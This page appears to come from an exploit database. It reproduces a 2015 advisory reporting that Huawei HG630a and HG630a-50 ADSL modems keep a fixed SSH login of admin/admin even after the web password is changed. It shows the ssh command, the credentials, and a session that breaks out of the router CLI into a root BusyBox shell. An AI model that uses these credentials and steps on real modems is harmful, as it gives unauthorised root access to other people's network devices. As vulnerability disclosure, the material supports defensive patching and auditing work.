[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Huawei HG630a and HG630a-50 - Default SSH Admin Password on ADSL Modems Vulnerability

Author
Murat Sahin
Risk
[
Security Risk High
]
0day-ID
0day-ID-24528
Category
remote exploits
Date add
10-11-2015
Platform
hardware
# Exploit Title: Huawei HG630a and HG630a-50 Default SSH Admin Password on
Adsl Modems
# Date: 10.11.2015
# Exploit Author: Murat Sahin
# Vendor Homepage: Huawei
# Version: HG630a and HG630a-50
# Tested on: linux,windows
 
Adsl modems force you to change admin web interface password. Even though
you can change admin password on the web interface,  the password you
assign does not apply to ssh. So, SSH password always  will be
'Username:admin Password:admin'.
 
Ex:
 
*ssh admin@modemIP <admin@192.168.1.1>*
admin@modemIP <admin@192.168.1.1>'s password:*admin*
PTY allocation request failed on channel 0
------------------------------
-
-----Welcome to ATP Cli------
-------------------------------
ATP>?
?
cls
debug
help
save
?
exit
ATP>shell
shell
 
 
BusyBox vv1.9.1 (2013-12-31 16:16:20 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
 
# cat /proc/version
cat /proc/version
Linux version 2.6.30 (y00179387@localhost) (gcc version 4.4.2
(Buildroot 2010.02-git) ) #10 SMP PREEMPT Tue Dec 31 16:20:50 CST 2013
#

#  0day.today [2024-12-25]  #